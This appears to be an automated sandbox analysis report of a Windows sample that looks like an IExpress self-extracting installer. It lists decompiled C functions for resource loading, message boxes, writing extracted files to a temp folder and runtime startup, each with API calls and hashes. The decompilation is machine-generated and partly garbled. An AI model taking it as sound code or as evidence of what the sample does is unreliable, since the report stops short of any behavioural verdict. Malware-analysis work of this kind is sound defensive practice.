                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-2381869747
                                                                                                                                                                                                      • Opcode ID: 5862d62734724dc7467628ee6cdadfa86f3dcd7ea8ab668d748c8b9a455350e7
                                                                                                                                                                                                      • Instruction ID: 6e8fe822de5247470f5a593a548dfd7e8fac9ded3b2039f7b5f0faa99be82a09
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5862d62734724dc7467628ee6cdadfa86f3dcd7ea8ab668d748c8b9a455350e7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8701D6706001089FDB10DB75EC49AEE7378EB90315F9055A5F58DB21C0DF709EC98A51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E00E74169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E00E7468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E00E7468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E00E744B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00E730B4), ref: 00E74189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00E730B4), ref: 00E741E7
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: d343a7f9aca91c7169229b822cae8ed96e6860eda8c64c2fd31babcf6693639d
                                                                                                                                                                                                      • Instruction ID: f738c007b3cd7b29454bba884abc85d94bad929fc2fd924828fc3df5e96b06b1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d343a7f9aca91c7169229b822cae8ed96e6860eda8c64c2fd31babcf6693639d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8201A9E13012243FF3246A6A5C86FBB218EDBD5799F45D029B70EF21C0ABA8CC4151B5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00E719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E00E743D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xe79a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x00e71a16
                                                                                                                                                                                                      0x00e71a18
                                                                                                                                                                                                      0x00e71a70
                                                                                                                                                                                                      0x00e71a72
                                                                                                                                                                                                      0x00e71a72
                                                                                                                                                                                                      0x00e71a14
                                                                                                                                                                                                      0x00e71a06
                                                                                                                                                                                                      0x00e71a81

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00E71A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00E71A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 00E71A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00E71A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 00E71A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 10941717e5f41b1c8869d6cad2e775b6a6c609b688eb237061621e59d22fbac4
                                                                                                                                                                                                      • Instruction ID: 0b6b0a6e976db08ea154c41eb9915ea5fc40c92744d90fe556ad333be8279556
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10941717e5f41b1c8869d6cad2e775b6a6c609b688eb237061621e59d22fbac4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5911C871501219AFEB10EF68DD08AAE77B8EF89301F5081A4F51EF7191DB309E45CB96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                                      			E00E763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				long _v272;
                                                                                                                                                                                                      				void* _v276;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      				signed int _t40;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                      				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_v276 = _a16;
                                                                                                                                                                                                      				_t37 = 1;
                                                                                                                                                                                                      				E00E71781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                      				E00E7658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                      				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                      					_t28 = _a4;
                                                                                                                                                                                                      					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                      						 *0xe79124 = 0x80070052;
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					CloseHandle(_t39);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					 *0xe79124 = 0x80070052;
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                      			}


                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7642D
                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7645B
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E7647A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E763EB
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 1065093856-1193786559
                                                                                                                                                                                                      • Opcode ID: b8c515bc8d824a79f6c64d13be22f5739394bfcf61d82463d58d73ac052f9ac1
                                                                                                                                                                                                      • Instruction ID: 97caaa67aff4c6b320d279d5e3f90bf0108472e428058823167ab01145ec0bb6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8c515bc8d824a79f6c64d13be22f5739394bfcf61d82463d58d73ac052f9ac1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D721D571A00219AFDB10DF25DC85FEB77B8EB85318F0081A9F599B3180DAB05DC98F64
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E747E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E00E71680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                      						_t11 =  *0xe791e0; // 0x8f8208
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0xe791e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0xe78584; // 0x0
                                                                                                                                                                                                      					E00E744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0xe78584; // 0x0
                                                                                                                                                                                                      				E00E744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00E74E6F), ref: 00E747EA
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00E74823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00E74847
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E74851
Memory Dump Source
• Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                      • API String ID: 359063898-1193786559
                                                                                                                                                                                                      • Opcode ID: 5dcc1469b5d377e66cf9e22ca95a74d2cdf6fb39b1f6142bb4dffe2169b153ab
                                                                                                                                                                                                      • Instruction ID: e66d333d59b6a40a28b31a945b4bfbda3c492b3544ce5f76e1d640528bc2146d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5dcc1469b5d377e66cf9e22ca95a74d2cdf6fb39b1f6142bb4dffe2169b153ab
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F81106F52046416FE719DF34AC18F763B9AEBC5300B04D519F94AF7381DB358C0A8660
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E73680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00e736ed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E7369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 00E736CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E736DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: 7928e0fbedaba6cc8d156aea1f4aea9e8b1804c2e6c3bcbd4bc27a26f2eb76dc
                                                                                                                                                                                                      • Instruction ID: 824e8a8871ce6e9e5f6914fa8149e39ea1c3c22fd00dafbffdab1ff19ac0d28f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7928e0fbedaba6cc8d156aea1f4aea9e8b1804c2e6c3bcbd4bc27a26f2eb76dc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F0184B29012557BDB30CAF75C48EEF767CEBC5B11F14412DB909F2180D660C644D661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E00E765E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00E72B33), ref: 00E76602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00E76612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00E76629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00E76635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: 3d5f00f28a266af7373e8d2531cf8af31c42874ddd1c5ba64d967d3ac4ad0f99
                                                                                                                                                                                                      • Instruction ID: 82ea448c8590ef3c83c206668e4e4d3c5af365ea599981502f956b95eaa3e1bc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d5f00f28a266af7373e8d2531cf8af31c42874ddd1c5ba64d967d3ac4ad0f99
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF044720098416EE7320B7A8C888BBAF9CCBC725DBAD41BFE48DB2000D2150D4A86A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E769B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0xe781f8 = E00E76C70();
                                                                                                                                                                                                      				__set_app_type(E00E76FBE(2));
                                                                                                                                                                                                      				 *0xe788a4 =  *0xe788a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0xe788a8 =  *0xe788a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0xe78528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0xe7851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E00E77000();
                                                                                                                                                                                                      				if( *0xe78000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E00E77000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E771EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E76FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00E76FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00E769C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00E769D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00E769E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 00E76A07
                                                                                                                                                                                                      Memory Dump Source
